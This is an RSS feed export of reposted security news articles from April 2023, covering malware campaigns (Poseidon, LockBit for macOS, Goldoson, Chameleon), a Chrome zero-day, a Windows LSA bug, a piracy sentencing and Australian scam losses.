<?xml version="1.0"?>
<rss version="2.0"><channel><title><![CDATA[News: Security & Privacy News]]></title><link>https://nsaneforums.com/news/security-privacy-news/page/78/?d=2</link><description><![CDATA[News: Security & Privacy News]]></description><language>en</language><item><title>Pakistani Hackers Use Linux Malware Poseidon to Target Indian Government Agencies</title><link>https://nsaneforums.com/news/security-privacy-news/pakistani-hackers-use-linux-malware-poseidon-to-target-indian-government-agencies-r14652/</link><description><![CDATA[<p>
	The Pakistan-based advanced persistent threat (APT) actor known as Transparent Tribe leveraged a two-factor authentication (2FA) tool used by Indian government agencies as a ruse to deliver a new Linux backdoor called Poseidon.
</p>

<p>
	 
</p>

<p>
	"Poseidon is a second-stage payload malware associated with Transparent Tribe," Uptycs security researcher Tejaswini Sandapolla said in a technical report published this week.
</p>

<p>
	 
</p>

<p>
	"It is a general-purpose backdoor that provides attackers with a wide range of capabilities to hijack an infected host. Its functionalities include logging keystrokes, taking screen captures, uploading and downloading files, and remotely administering the system in various ways."
</p>

<p>
	 
</p>

<p>
	Transparent Tribe is also tracked as APT36, Operation C-Major, PROJECTM, and Mythic Leopard, and has a track record of targeting Indian government organizations, military personnel, defense contractors, and educational entities.
</p>

<p>
	 
</p>

<p>
	It has also repeatedly leveraged trojanized versions of Kavach, the Indian government-mandated 2FA software, to deploy a variety of malware, such as CrimsonRAT and LimePad, to harvest valuable information.
</p>

<p>
	 
</p>

<p style="text-align:center;">
	<img alt="linux.png" class="ipsImage" data-ratio="28.75" height="204" width="720" src="https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgf5OW6lGHaXK82mhT-MZCDimu_gyFpBJrFSq7NenjThjCWnV9D7rj9JDl0e27j-QALpJjd1RylUKhWyVUOAw_9HT457eAD0I6EGw3LD2a6C7dAqVyZtahbxpnTzs_MAh5OT26JOUBWGyKISLdtK_WvcIznG9HIPpZTnXjEPuYwt--B31v8mZ9J3txt/s728-e3650/linux.png" />
</p>

<p>
	 
</p>

<p>
	Another phishing campaign detected late last year took advantage of weaponized attachments to download malware designed to exfiltrate database files created by the Kavach app.
</p>

<p>
	 
</p>

<p>
	The latest set of attacks entails the use of a backdoored version of Kavach to target Linux users working for Indian government agencies, indicating attempts by the threat actor to expand its attack spectrum beyond the Windows and Android ecosystems.
</p>

<p>
	 
</p>

<p>
	"When a user interacts with the malicious version of Kavach, the genuine login page is displayed to distract them," Sandapolla explained. "Meanwhile, the payload is downloaded in the background, compromising the user's system."
</p>

<p>
	 
</p>

<p>
	The starting point of the infections is an ELF malware sample, a compiled Python executable that's engineered to retrieve the second-stage Poseidon payload from a remote server.
</p>

<p>
	 
</p>

<p>
	The cybersecurity firm noted that the fake Kavach apps are primarily distributed through rogue websites disguised as legitimate Indian government sites. These include www.ksboard[.]in and www.rodra[.]in.
</p>

<p>
	 
</p>

<p>
	With social engineering being the primary attack vector used by Transparent Tribe, users working within the Indian government are advised to double-check URLs received in emails before opening them.
</p>

<p>
	 
</p>

<p>
	"Repercussions of this APT36 attack could be significant, leading to loss of sensitive information, compromised systems, financial losses, and reputational damage," Sandapolla said.
</p>

<p>
	 
</p>

<p>
	<strong><a href="https://thehackernews.com/2023/04/pakistani-hackers-use-linux-malware.html" rel="external nofollow">Source</a></strong>
</p>
]]></description><guid isPermaLink="false">14652</guid><pubDate>Wed, 19 Apr 2023 15:14:54 +0000</pubDate></item><item><title>Google Chrome Hit by Second Zero-Day Attack - Urgent Patch Update Released</title><link>https://nsaneforums.com/news/security-privacy-news/google-chrome-hit-by-second-zero-day-attack-urgent-patch-update-released-r14651/</link><description><![CDATA[<p>
	Google on Tuesday rolled out emergency fixes to address another actively exploited high-severity zero-day flaw in its Chrome web browser.
</p>

<p>
	 
</p>

<p>
	The flaw, tracked as CVE-2023-2136, is described as a case of integer overflow in Skia, an open source 2D graphics library. Clément Lecigne of Google's Threat Analysis Group (TAG) has been credited with discovering and reporting the flaw on April 12, 2023.
</p>

<p>
	 
</p>

<p>
	"Integer overflow in Skia in Google Chrome prior to 112.0.5615.137 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page," according to the NIST's National Vulnerability Database (NVD).
</p>

<p>
	 
</p>

<p>
	The tech giant, which also fixed seven other security issues with the latest update, said it's aware of active exploitation of the flaw, but did not disclose additional details to prevent further abuse.
</p>

<p>
	 
</p>

<p>
	The development marks the second Chrome zero-day vulnerability to be exploited by malicious actors this year, and comes merely days after Google patched CVE-2023-2033 last week. It's not immediately clear if the two zero-days have been chained together as part of in-the-wild attacks.
</p>

<p>
	 
</p>

<p>
	Users are recommended to upgrade to version 112.0.5615.137 for Windows, macOS, and Linux to mitigate potential threats. <span style="color:#c0392b;">Users of Chromium-based browsers such as Microsoft Edge, Brave, Opera, and Vivaldi are also advised to apply the fixes as and when they become available</span>.
</p>

<p>
	 
</p>

<p>
	<strong><a href="https://thehackernews.com/2023/04/google-chrome-hit-by-second-zero-day.html" rel="external nofollow">Source</a></strong>
</p>
]]></description><guid isPermaLink="false">14651</guid><pubDate>Wed, 19 Apr 2023 15:12:04 +0000</pubDate></item><item><title>Microsoft may have fixed LSA bug with kernel-mode hardware stack protection in Windows 11</title><link>https://nsaneforums.com/news/security-privacy-news/microsoft-may-have-fixed-lsa-bug-with-kernel-mode-hardware-stack-protection-in-windows-11-r14634/</link><description><![CDATA[<p>
	Microsoft may have quietly fixed a widespread issue that was affecting Windows Defender recently. Following multiple user reports and complaints, the company confirmed that a recent Defender update (<a href="https://www.neowin.net/news/microsoft-confirms-recent-defender-lsa-issue-on-windows-11-issues-workaround/" rel="external nofollow">KB5007651, version 1.0.2302.21002</a>), released via March's Patch Tuesday, led to an error that caused the Windows Security app to wrongly display Local Security Authority (or LSA) protection as disabled. This left users worried as the message would suggest that their devices could be vulnerable.
</p>

<p>
	 
</p>

<p>
	As a result of the bug, users were unable to toggle LSA protection on: the device restart prompted by the change would do nothing, and the setting would revert automatically. In essence, LSA protection would remain disabled even after the PC was restarted as instructed by the Defender app.
</p>

<p>
	 
</p>

<p>
	Microsoft had provided a workaround for the issue, and it basically <a href="https://www.neowin.net/news/microsoft-confirms-recent-defender-lsa-issue-on-windows-11-issues-workaround/" rel="external nofollow">involved dismissing such warnings</a>. However, the company may have since fixed the problem with a more recent Defender update (KB5007651).
</p>

<p>
	 
</p>

<p>
	According to <a href="https://www.deskmodder.de/blog/2023/04/18/microsoft-defender-antischadsoftware-update-mit-neuem-hardware-gestuetzter-stapelschutz-fasr/" rel="external nofollow">Deskmodder</a>, the new update, Windows Security Service version 1.0.2303.27001, has supposedly fixed the issue. The site suggests the issue was resolved by an update to the "Kernel-mode Hardware-enforced Stack Protection" security feature present under Core Isolation (VBS). The feature was introduced <a href="https://www.neowin.net/news/here-are-all-the-new-security-features-in-the-windows-11-2022-update/" rel="external nofollow">with Windows 11 22H2</a>. However, this update (KB5007651) was released nearly two weeks ago and Microsoft's known issues dashboard still lists the <a href="https://learn.microsoft.com/en-us/windows/release-health/status-windows-11-22H2#-local-security-authority-protection-is-off---with-persistent-restart" rel="external nofollow">bug as open</a>. Hence, there may be more to the story here.
</p>

<p>
	 
</p>

<p>
	Elsewhere online, others are also noticing that the setting may be disabled by default (via <a href="https://www.elevenforum.com/t/kernel-mode-hardware-enforced-stack-protection-suddenly-off.14250/#post-287639" rel="external nofollow">Windows 11 forums</a>), or it could be a bug. In order to use the Kernel-mode Hardware-enforced Stack Protection feature, Intel's Control-flow Enforcement Technology (CET) or AMD Shadow Stack technology is required. Supported chips include Intel 11th Gen Tiger Lake or newer parts, or AMD Zen 3 and newer.
</p>

<p>
	 
</p>

<p>
	 
</p>

<p>
	<a href="https://www.neowin.net/news/microsoft-may-have-fixed-lsa-bug-with-kernel-mode-hardware-stack-protection-in-windows-11/" rel="external nofollow">Microsoft may have fixed LSA bug with kernel-mode hardware stack protection in Windows 11</a>
</p>
]]></description><guid isPermaLink="false">14634</guid><pubDate>Tue, 18 Apr 2023 19:35:45 +0000</pubDate></item><item><title>Apple&#x2019;s Macs have long escaped ransomware, but that may be changing</title><link>https://nsaneforums.com/news/security-privacy-news/apple%E2%80%99s-macs-have-long-escaped-ransomware-but-that-may-be-changing-r14633/</link><description><![CDATA[<h3>
	Malicious encryptors for Apple computers could herald new risks for macOS users.
</h3>

<div itemprop="articleBody">
	
	<p>
		Security researchers are examining newly discovered Mac ransomware samples from the <a href="https://www.wired.com/story/lockbit-ransomware-attacks/" rel="external nofollow">notorious gang LockBit</a>, marking the first known example of a prominent ransomware group toying with macOS versions of its malware.
	</p>

	<p>
		 
	</p>

	<p>
		Ransomware is a pervasive threat, but attackers typically don't bother creating versions of their malware to target Macs. That's because Apple's computers, while popular, are much less prevalent than those running Windows, Linux, and other operating systems. Over the years, though, samples of seemingly experimental Mac ransomware have <a href="https://arstechnica.com/information-technology/2016/03/first-mac-targeting-ransomware-hits-transmission-users-researchers-say/" rel="external nofollow">cropped up</a> a <a href="https://arstechnica.com/information-technology/2020/07/new-mac-ransomware-is-even-more-sinister-than-it-appears/?comments=1&amp;comments-page=1" rel="external nofollow">couple of times</a>, creating a sense that the risk could escalate at any moment.
	</p>

	<p>
		 
	</p>

	<p>
		<a href="https://twitter.com/malwrhunterteam/status/1647384505550876675" rel="external nofollow">Spotted by MalwareHunterTeam</a>, the samples of ransomware encryptors seem to have first cropped up in the malware analysis repository VirusTotal in November and December 2022, but went unnoticed until yesterday. LockBit seems to have created versions of the encryptor targeting both newer Macs running Apple processors and older Macs that ran on Apple's PowerPC chips.
	</p>

	<p>
		 
	</p>
	<p>
		Researchers say the LockBit Mac ransomware appears to be more of a first foray than anything that's fully functional and ready to be used. But the tinkering could indicate future plans, especially given that more businesses and institutions have been incorporating Macs, which could make it more appealing for ransomware attackers to invest time and resources so they can target Apple computers.
	</p>

	<p>
		 
	</p>

	<p>
		“It’s unsurprising but concerning that a large and successful ransomware group has now set their sights on macOS,” says longtime Mac security researcher and Objective-See Foundation founder Patrick Wardle. “It would be naive to assume that LockBit won’t improve and iterate on this ransomware, potentially creating a more effective and destructive version.”
	</p>

	<p>
		 
	</p>

	<p>
		Apple declined to comment on the findings.
	</p>

	<p>
		 
	</p>

	<p>
		LockBit is a Russia-based ransomware gang that emerged at the end of 2019. The group is best known for its sheer volume of attacks and for appearing well-organized and being less ostentatious and sophomoric than some of its peers in the cybercriminal landscape. But LockBit isn't immune from arrogance and public aggression. Notably, it called significant attention to itself in recent months by targeting the <a href="https://www.wired.com/story/royal-mail-ransomware-attack-security-roundup/" rel="external nofollow">United Kingdom's Royal Mail</a> and a Canadian children's hospital.
	</p>

	<p>
		 
	</p>

	<p>
		For now, Wardle notes that LockBit's macOS encryptors seem to be in a very early phase and still have fundamental development <a href="https://objective-see.org/blog/blog_0x75.html" rel="external nofollow">issues</a> like crashing on launch. And to create truly effective attack tools, LockBit will need to figure out how to circumvent macOS protections, including validity checks that Apple has added in recent years for running new software on Macs.
	</p>

	<p>
		 
	</p>

	<p>
		“In some sense, Apple is ahead of the threat, as recent versions of macOS ship with a myriad of built-in security mechanisms aimed to directly thwart, or at least reduce the impact of, ransomware attacks,” Wardle says. “However, well-funded ransomware groups will continue to evolve their malicious creations.”
	</p>

	<p>
		 
	</p>

	<p>
		Developing Mac ransomware may not be the highest priority on every attacker's to-do list, but the field is shifting. As law enforcement worldwide pushes to counter attacks, and victims increasingly have input and resources available to avoid paying, ransomware gangs are <a href="https://www.wired.com/story/ransomware-tactics-cancer-photos-student-records/" rel="external nofollow">getting more desperate</a> for new or refined strategies that will help them get paid.
	</p>

	<p>
		 
	</p>

	<p>
		“The LockBit encryptor doesn’t look particularly viable in its current form, but I’m definitely going to be keeping an eye on it,” says Thomas Reed, director of Mac and mobile platforms at the antivirus maker Malwarebytes. “The viability may improve in the future. Or it may not, if their tests aren’t promising.”
	</p>

	<p>
		 
	</p>

	<p>
		Still, for ransomware actors looking to generate as much revenue as possible, Macs are a potentially appealing untilled field.
	</p>

	<p>
		 
	</p>

	<p>
		This story originally appeared on <a href="https://www.wired.com/story/apple-mac-lockbit-ransomware-samples/" rel="external nofollow">wired.com</a>.
	</p>

	<p>
		 
	</p>
</div>

<p>
	 
</p>

<p>
	<a href="https://arstechnica.com/information-technology/2023/04/apples-macs-have-long-escaped-ransomware-but-that-may-be-changing/" rel="external nofollow">Apple’s Macs have long escaped ransomware, but that may be changing</a>
</p>
]]></description><guid isPermaLink="false">14633</guid><pubDate>Tue, 18 Apr 2023 19:34:52 +0000</pubDate></item><item><title>Nintendo hacker Bowser released from prison, will pay off fine for the rest of his life</title><link>https://nsaneforums.com/news/security-privacy-news/nintendo-hacker-bowser-released-from-prison-will-pay-off-fine-for-the-rest-of-his-life-r14632/</link><description><![CDATA[<p>
	If you follow Nintendo news, you may know that a hacker named Gary Bowser (not to be confused with Nintendo America's president Doug Bowser or the Mario supervillain Bowser) was arrested last year for being a member of piracy group "Team-Xecuter". This group enabled Switch owners to hack their Switch devices to play pirated games on the console.
</p>

<p>
	 
</p>

<p>
	Although Team-Xecuter reportedly bagged millions of dollars from this illegal operation, Bowser played a relatively minor role in this process, receiving roughly $320,000 over the course of seven years. Regardless, he was prosecuted by Nintendo and was sentenced to 40 months in prison along with a $15 million fine, out of which $10 million is damages to Nintendo.
</p>

<p>
	 
</p>

<p>
	Now, Bowser has reportedly been released from a federal U.S. prison due to good behavior and is on his way back to his home country, Canada. Despite being freed from the detention center, Bowser faces a difficult road ahead. He has to pay Nintendo a maximum of 25-30% of his gross monthly salary once he lands a stable job until the damages are paid off. Currently, he has paid $175 through multiple $25 payments based on the wages he was getting in prison.
</p>

<p>
	 
</p>

<p>
	It's unlikely that 51-year-old Gary Bowser will ever be able to pay off his fines completely, but that's not Nintendo's goal here either. While the company claimed that it spent $65 million to upgrade the Switch's anti-piracy measures to circumvent Team-Xecuter's tactics, the fine is just to deter future hackers from going down the same path. Nintendo had previously stated that:
</p>

<p>
	 
</p>

<p style="margin-left: 40px;">
	This is a very significant moment for us. It’s the purchase of video games that sustains Nintendo and the Nintendo ecosystem, and it is the games that make the people smile. It’s for that reason that we do all we can to prevent games on Nintendo systems from being stolen.
</p>

<p>
	 
</p>

<p>
	Bowser has six months to go before he begins paying his next installments to Nintendo in order to pay off the remaining ~$10 million.
</p>

<p>
	 
</p>

<p>
	Source: <a href="https://torrentfreak.com/nintendo-hacker-gary-bowser-released-from-federal-prison-230417/" rel="external nofollow">TorrentFreak</a> via <a href="https://www.nintendolife.com/news/2023/04/nintendo-hacker-gary-bowser-has-been-released-from-prison" rel="external nofollow">Nintendo Life</a> | <a href="https://knowyourmeme.com/memes/peaches-by-bowser-super-mario-bros-movie" rel="external nofollow">Image via Know Your Meme</a>
</p>

<p>
	 
</p>

<p>
	 
</p>

<p>
	<a href="https://www.neowin.net/news/nintendo-hacker-bowser-released-from-prison-will-pay-off-fine-for-the-rest-of-his-life/" rel="external nofollow">Nintendo hacker Bowser released from prison, will pay off fine for the rest of his life</a>
</p>
]]></description><guid isPermaLink="false">14632</guid><pubDate>Tue, 18 Apr 2023 19:33:14 +0000</pubDate></item><item><title>Australians lost a record $3.1 billion to scams last year</title><link>https://nsaneforums.com/news/security-privacy-news/australians-lost-a-record-31-billion-to-scams-last-year-r14619/</link><description><![CDATA[<p>
	<span style="font-size:14px;">The Australian Competition &amp; Consumer Commission (ACCC) says Australians lost a record $3.1 billion to scams in 2022, an 80% increase over the total losses recorded in 2021.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">Most of the losses concern investment scams, which accounted for $1.5 billion, followed by remote access scams that resulted in losses of $229 million, and payment redirection scams that cost victims another $224 million.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">These figures are based on data collected by ACCC’s Scamwatch, ReportCyber, the Australian Financial Crimes Exchange (AFCX), IDCARE, and various other government agencies.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">According to ACCC, the number of scam reports submitted to Scamwatch last year was just under 240,000, 16.5% lower than in 2021. However, the financial losses per victim rose by 50% to an average of $20,000.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">ACCC’s Deputy Chair Catriona Lowe commented that this increase in the effectiveness of scams results from a growing sophistication in the themes used by the attackers, making the scams more believable.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">“We have seen alarming new tactics emerge which make scams incredibly difficult to detect,” <a href="https://www.scamwatch.gov.au/news-alerts/accc-calls-for-united-front-as-scammers-steal-over-3bn-from-australians" rel="external nofollow">commented Lowe</a>.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">“This includes everything from impersonating official phone numbers, email addresses, and websites of legitimate organizations to scam texts that appear in the same conversation thread as genuine messages.”</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">“Hi Mom” and “toll/Linkt” text scams had an explosive growth of 469% in 2022, tricking Australians into losing almost $25 million.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">The most significant driver, though, was data breaches, which had a record year in Australia in 2022. </span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">These security incidents are excellent opportunities for scammers who use them as bait for fraudulent communications with targets.</span>
</p>

<p>
	 
</p>

<div>
	<span style="font-size:14px;">“In the weeks after the data breaches, there were hundreds of reports to Scamwatch, including reports of scammers impersonating government departments and businesses to carry out identity theft and remote access scams.” - ACCC.</span>
</div>

<div>
	 
</div>

<p>
	<span style="font-size:14px;">A noteworthy security incident from 2022 that scammers abused was <a href="https://www.bleepingcomputer.com/news/security/optus-hacker-apologizes-and-allegedly-deletes-all-stolen-data/" rel="external nofollow">the breach of Optus in September 2022</a>, which resulted in the leak of the personal data of 11 million customers of the telecommunications company.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">In October 2022, the Australian Federal Police (AFP) <a href="https://www.bleepingcomputer.com/news/security/police-arrest-teen-for-using-leaked-optus-data-to-extort-victims/" rel="external nofollow">arrested</a> a young Sydney resident who attempted to extort thousands of Optus customers via SMS, demanding a payment of $1,300 not to sell their data to hackers.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">The most notable data breach in Australia for 2023 is Latitude Financial, which <a href="https://www.bleepingcomputer.com/news/security/latitude-financial-data-breach-now-impacts-14-million-customers/" rel="external nofollow">impacted 14 million customers</a> of the personal loans service provider.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">The Australian state approved a bill that amends the country’s privacy legislation late last year, setting a maximum <a href="https://www.bleepingcomputer.com/news/security/australia-will-now-fine-firms-up-to-au50-million-for-data-breaches/" rel="external nofollow">penalty of AU$50 million</a> for firms that suffer large-scale data breaches.</span>
</p>

<p>
	 
</p>

<p>
	<a href="https://www.bleepingcomputer.com/news/security/australians-lost-a-record-31-billion-to-scams-last-year/" rel="external nofollow">Source</a>
</p>
]]></description><guid isPermaLink="false">14619</guid><pubDate>Tue, 18 Apr 2023 17:43:32 +0000</pubDate></item><item><title>Android malware infiltrates 60 Google Play apps with 100M installs</title><link>https://nsaneforums.com/news/security-privacy-news/android-malware-infiltrates-60-google-play-apps-with-100m-installs-r14595/</link><description><![CDATA[<p>
	<span style="font-size:14px;">A new Android malware named 'Goldoson' has infiltrated Google Play through 60 legitimate apps that collectively have 100 million downloads.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">The malicious component is part of a third-party library used by all sixty apps, which the developers unknowingly added to their apps.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">Some of the impacted apps are:</span>
</p>

<p>
	 
</p>

<ul>
	<li>
		<span style="font-size:14px;">L.POINT with L.PAY - 10 million downloads</span>
	</li>
	<li>
		<span style="font-size:14px;">Swipe Brick Breaker - 10 million downloads</span>
	</li>
	<li>
		<span style="font-size:14px;">Money Manager Expense &amp; Budget - 10 million downloads</span>
	</li>
	<li>
		<span style="font-size:14px;">GOM Player - 5 million downloads</span>
	</li>
	<li>
		<span style="font-size:14px;">LIVE Score, Real-Time Score - 5 million downloads</span>
	</li>
	<li>
		<span style="font-size:14px;">Pikicast - 5 million downloads</span>
	</li>
	<li>
		<span style="font-size:14px;">Compass 9: Smart Compass - 1 million downloads</span>
	</li>
	<li>
		<span style="font-size:14px;">GOM Audio - Music, Sync lyrics - 1 million downloads</span>
	</li>
	<li>
		<span style="font-size:14px;">LOTTE WORLD Magicpass - 1 million downloads</span>
	</li>
	<li>
		<span style="font-size:14px;">Bounce Brick Breaker - 1 million downloads</span>
	</li>
	<li>
		<span style="font-size:14px;">Infinite Slice - 1 million downloads</span>
	</li>
	<li>
		<span style="font-size:14px;">SomNote - Beautiful note app - 1 million downloads</span>
	</li>
	<li>
		<span style="font-size:14px;">Korea Subway Info: Metroid - 1 million downloads</span>
	</li>
</ul>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">According to <a href="https://www.mcafee.com/blogs/other-blogs/mcafee-labs/goldoson-privacy-invasive-and-clicker-android-adware-found-in-popular-apps-in-south-korea/" rel="external nofollow">McAfee's research team</a>, which discovered Goldoson, the malware can collect data on installed apps, WiFi and Bluetooth-connected devices, and the user's GPS locations.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">Additionally, it can perform ad fraud by clicking ads in the background without the user's consent.</span>
</p>

<h2>
	<span style="font-size:14px;">Stealing data from Android devices</span>
</h2>

<p>
	<span style="font-size:14px;">When the user launches an app that contains Goldoson, the library registers the device and receives its configuration from a remote server whose domain is obfuscated.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">The configuration contains parameters that set which data-stealing and ad-clicking functions Goldoson should run on the infected device and how often.</span>
</p>

<p>
	 
</p>

<div>
	<img alt="config.png" class="ipsImage" data-ratio="90.76" height="540" width="404" src="https://www.bleepstatic.com/images/news/u/1220909/2023/Android/11/config.png" />
	<p>
		<span style="font-size:14px;">Goldoson configuration (McAfee)</span>
	</p>

	<p>
		 
	</p>
</div>

<p>
	<span style="font-size:14px;">The data collection function is typically set to activate every two days, sending to the C2 server a list of installed apps, geographical location history, MAC address of devices connected over Bluetooth and WiFi, and more.</span>
</p>

<p>
	 
</p>

<div>
	<img alt="json-data.png" class="ipsImage" data-ratio="54.84" height="334" width="609" src="https://www.bleepstatic.com/images/news/u/1220909/2023/Android/11/json-data.png" />
	<p>
		<span style="font-size:14px;">JSON request that exfiltrates data (McAfee)</span>
	</p>

	<p>
		 
	</p>
</div>

<p>
	<span style="font-size:14px;">The level of data collection depends on the permissions granted to the infected app during its installation and the Android version. Android 11 and above are better protected against arbitrary data collection; however, McAfee found that even in recent versions of the OS, Goldoson had enough permissions to gather sensitive data in 10% of the apps.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">The ad-clicking function takes place by loading HTML code and injecting it into a customized, hidden WebView, and then using that to perform multiple URL visits, generating ad revenue. </span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">The victim does not see any indication of this activity on their device.</span>
</p>

<p>
	 
</p>

<div>
	<img alt="ad-clicking.png" class="ipsImage" data-ratio="75.10" height="501" width="720" src="https://www.bleepstatic.com/images/news/u/1220909/2023/Android/11/ad-clicking.png" />
	<p>
		<span style="font-size:14px;">Goldoson's ad-clicking activity (McAfee)</span>
	</p>
</div>

<h2>
	<span style="font-size:14px;">Library removed, but risk still there</span>
</h2>

<p>
	<span style="font-size:14px;">McAfee is a Google App Defense Alliance member that helps keep Google Play clean from malware/adware threats. As such, the researchers informed Google about its findings, and the developers of the impacted apps were alerted accordingly.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">Many of the affected apps were cleaned by their developers, who removed the offending library, and those that didn't respond in time had their apps removed from Google Play for non-compliance with the store's policies.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">Google confirmed the action to BleepingComputer, stating that the apps violated Google Play policies.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">"The safety of users and developers are at the core of Google Play. When we find apps that violate our policies, we take appropriate action," Google told BleepingComputer.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">"We have notified the developers that their apps are in violation of Google Play policies and fixes are needed to come into compliance."</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">Users who installed an impacted app from Google Play can remediate the risk by applying the latest available update.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">However, Goldoson exists on third-party Android app stores too, and the chances of those still harboring the malicious library are high.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">Common signs of adware and malware infection include device heating up, battery draining quickly, and unusually high internet data usage even when the device is not in use.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;"><a href="https://www.bleepingcomputer.com/news/security/android-malware-infiltrates-60-google-play-apps-with-100m-installs/" rel="external nofollow">Source</a></span>
</p>
]]></description><guid isPermaLink="false">14595</guid><pubDate>Mon, 17 Apr 2023 18:45:58 +0000</pubDate></item><item><title>New Chameleon Android malware mimics bank, govt, and crypto apps</title><link>https://nsaneforums.com/news/security-privacy-news/new-chameleon-android-malware-mimics-bank-govt-and-crypto-apps-r14592/</link><description><![CDATA[<p>
	<span style="font-size:14px;">A new Android trojan called ‘Chameleon’ has been targeting users in Australia and Poland since the start of the year, mimicking the CoinSpot cryptocurrency exchange, an Australian government agency, and the IKO bank.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">The mobile malware was discovered by cybersecurity firm <a href="https://blog.cyble.com/2023/04/13/chameleon-a-new-android-malware-spotted-in-the-wild/" rel="external nofollow">Cyble</a>, which reports seeing distribution through compromised websites, Discord attachments, and Bitbucket hosting services.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">Chameleon includes a wide range of malicious functionality, including stealing user credentials through overlay injections and keylogging, as well as cookies and SMS texts from the infected device.</span>
</p>

<h2>
	<span style="font-size:14px;">A focus on evasion</span>
</h2>

<p>
	<span style="font-size:14px;">Upon launch, the malware performs a variety of checks to evade detection by security software.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">These checks include anti-emulation checks that detect whether the device is rooted and whether debugging is enabled, conditions that increase the likelihood that the app is running in an analyst’s environment.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">If the environment appears clean, the infection continues, and Chameleon requests the victim to permit it to use the Accessibility Service, which it abuses to grant itself additional permissions, disable Google Play Protect, and stop the user from uninstalling it.</span>
</p>

<p>
	 
</p>

<div>
	
		<img alt="accessibility.png" class="ipsImage" data-ratio="70.00" height="352" width="720" src="https://www.bleepstatic.com/images/news/u/1220909/2023/Android/12/accessibility.png" />
		
			<p>
				<span style="font-size:14px;">Requesting permission to use the Accessibility Service (Cyble)</span>
			</p>

			<p>
				 
			</p>
		
	
</div>

<p>
	<span style="font-size:14px;">At first connection with the C2, Chameleon sends the device version, model, root status, country, and precise location, probably to profile the new infection.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">Next, depending on what entity the malware impersonates, it opens its legitimate URL in a WebView and starts loading malicious modules in the background.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">These include a cookie stealer, a keylogger, an injector of phishing pages, a lock screen PIN/pattern grabber, and an SMS stealer that can snatch one-time passwords and help the attackers bypass 2FA protections.</span>
</p>

<p>
	 
</p>

<div>
	
		<img alt="capt-sms.png" class="ipsImage" data-ratio="70.56" height="356" width="720" src="https://www.bleepstatic.com/images/news/u/1220909/2023/Android/12/capt-sms.png" />
		
			<p>
				<span style="font-size:14px;">SMS interception (Cyble)</span>
			</p>

			<p>
				 
			</p>
		
	
</div>

<p>
	<span style="font-size:14px;">Most of these data-stealing systems rely on the abuse of Accessibility Services to work as required, allowing the malware to monitor the screen content, monitor for specific events, intervene to modify interface elements, or send certain API calls as needed.</span>
</p>

<p>
	 
</p>

<div>
	
		<img alt="lock-screen.png" class="ipsImage" data-ratio="59.17" height="299" width="720" src="https://www.bleepstatic.com/images/news/u/1220909/2023/Android/12/lock-screen.png" />
		
			<p>
				<span style="font-size:14px;">Abuse of Accessibility Service to retrieve lock screen password (Cyble)</span>
			</p>

			<p>
				 
			</p>
		
	
</div>

<p>
	<span style="font-size:14px;">The same system service is also abused to prevent the uninstallation of the malware, identifying when the victim attempts to remove the malicious app and deleting its shared preference variables to make it appear as if it’s no longer present on the device.</span>
</p>

<p>
	 
</p>

<div>
	
		<img alt="delete-files.png" class="ipsImage" data-ratio="26.94" height="136" width="720" src="https://www.bleepstatic.com/images/news/u/1220909/2023/Android/12/delete-files.png" />
		
			<p>
				<span style="font-size:14px;">Auto-delete shared preferences variables (Cyble)</span>
			</p>

			<p>
				 
			</p>
		
	
</div>

<p>
	<span style="font-size:14px;">The wiping of shared preferences files forces the app to re-establish communications with the C2 the next time it launches but prevents its uninstallation and makes it harder for researchers to analyze.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">Cyble also observed code that enables Chameleon to download a payload during runtime and save it on the host as a “.jar” file, to be executed later via DexClassLoader. However, this feature is currently unused.</span>
</p>

<p>
	 
</p>

<div>
	
		<img alt="download-jar.png" class="ipsImage" data-ratio="31.53" height="159" width="720" src="https://www.bleepstatic.com/images/news/u/1220909/2023/Android/12/download-jar.png" />
		
			<p>
				<span style="font-size:14px;">Code to download additional payloads (Cyble)</span>
			</p>

			<p>
				 
			</p>
		
	
</div>

<p>
	<span style="font-size:14px;">Chameleon is an emerging threat that may add more features and capabilities in future versions.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">Android users are advised to be cautious with apps they install on their devices, only download software from official stores, and ensure that Google Play Protect is always enabled.</span>
</p>

<p>
	 
</p>

<p>
